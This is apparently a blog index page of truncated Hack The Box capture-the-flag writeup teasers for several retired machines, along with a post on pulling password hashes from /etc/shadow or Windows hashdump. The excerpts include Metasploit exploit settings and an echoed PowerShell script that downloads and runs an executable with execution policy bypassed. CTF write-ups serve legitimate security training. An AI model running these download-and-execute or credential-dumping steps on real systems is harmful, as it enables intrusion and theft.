Hackthebox ServMon writeup 3.4 (5)

Hackthebox ServMon writeup

Basic Information Difficulty-EasyType -WindowsPoints-20Maker-dmw0ngUser Blood- sampriti:08 mins, 06 seconds. Root Blood-sampriti:34 mins, 10 seconds. Steps involved 1-Port Scanning2-Searching exploit for NVMS-10003-Directory Traversal(Using Burp just POC)4-FTP enumeration5-Extracting passwords Using Directory Traversal 6-SSH login into Nadine(user.tx)7-Revising FTP and Nmap enumerations8-Checking Service on port 84439-Local port forwarding through SSH10-Searching exploit for NSClient++11-Exploiting NSClient with CLI12-Getting Root.txt Commands involved … Read more

Passwords for the Active Hack the Box machines 4.3 (6)

Passwords for the Active Hack the Box machines

New methods For linux -cat /etc/shadow Example this. root:$6$YIFGN9YscCV72BjFtx/tehbc7sQTJp09c5.:18277:0:99999:7:::So use the highlighted part as the password.So password = YIFGN9YscCV72BjFtx/ For Windows Use ntlm hash Example Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c:::  password = 31d6cfe0d16ae931b73c59d7e0c Old methods For linux 1- cat /etc/shadow2-copy whole hash(root)root:$6$YIFGN9YscCV72BjFtx/tehbc7sQTJp09c5.:18277:0:99999:7:::3-Then find it’s MD5 sum and that’s your password for writeup For windows 1-Find root hash with hashdump.exe … Read more

Hackthebox Granny writeup 0 (0)

Hackthebox Granny writeup

Commands used 1-nmap -sC -v exploit/windows/iis/iis_webdav_scstoragepathfromurl4-set targeturi /_vti_bin5-set rhosts lhost your_ip6-set lport 12347-run Steps involved Steps invloved 1-Port Scanning2-Searching exploit for IIS 6.03-Exploiting IIS with metasploit Port scan Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-16 23:06 EDT NSE: Loaded 119 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 23:06 Completed NSE … Read more

Hack the box Arctic writeup 2 (1)

Hack the box Arctic writeup

Steps involved 1-Port scanning2-Exploiting ColdFusion 8 on port 85003-Cracking hash4-uploading reverse shell5-privilage escalation 6-Getting root.txt Commands Used 1-nmap -sC -sV -O -p- -v -oV hash –wordlist=/root/Desktop/rockyou.txt4-echo $webclient = New-Object System.Net.WebClient >>wget.ps15-echo $url = “” >>wget.ps16-echo $file = “exploit.exe” >>wget.ps17- echo $webclient.DownloadFile($url,$file) >>wget.ps1 8-powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 Port Scanning Nmap 7.70 … Read more

Hack the box Optimum writeup 0 (0)

hack the box optimum writeup

Brief It is a easy windows machine from hack the box.It’s easy but root part is little hard and more enumeration is required for it.But once you get it’s so easy. It has only a single port .And the walk through is around HFS exploits using metasploit.And then privilege escalation through a integer overflow. Steps … Read more

Hack the box Brainfuck writeup 4.8 (11)

Hack the box Brainfuck writeup

Brief It is a retired machine from hack the box. It’s a linux insane machine . Steps involved 1-Port scanning2-Enumerating SSLcertificates3-Editing our host file4-Exploiting WP Support Plus5-Getting email password6-Getting creds for secret form7-Decoding Vigenere ciphers8-Decrypting the id_rsa keyprase9-Getting user.txt10-Decrypting the root.txt11-Getting root.txt Commands involved 1-nmap -sC -sV -O -v -oV /etc/hosts3-wpscan –url https://brainfuck.htb –disable-tls-checks4-searchsploit … Read more